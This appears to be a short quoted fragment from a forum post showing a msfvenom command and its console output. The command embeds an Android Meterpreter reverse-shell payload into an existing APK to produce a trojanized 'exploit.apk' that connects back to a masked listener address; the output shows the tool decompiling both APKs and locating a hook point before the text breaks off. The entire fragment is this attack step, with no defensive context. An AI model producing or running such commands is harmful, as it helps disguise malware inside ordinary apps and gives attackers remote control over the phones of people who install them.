Citar
sudo msfvenom -x appdebug.apk -p android/meterpreter/reverse_tcp lhost=xxx.xxx.x.xx lport=80 -o exploit.apk
Using APK template: appdebug.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Using APK template: appdebug.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
- Creating signing key and keystore..
- Decompiling original APK..
- Decompiling payload APK..
- Locating hook point..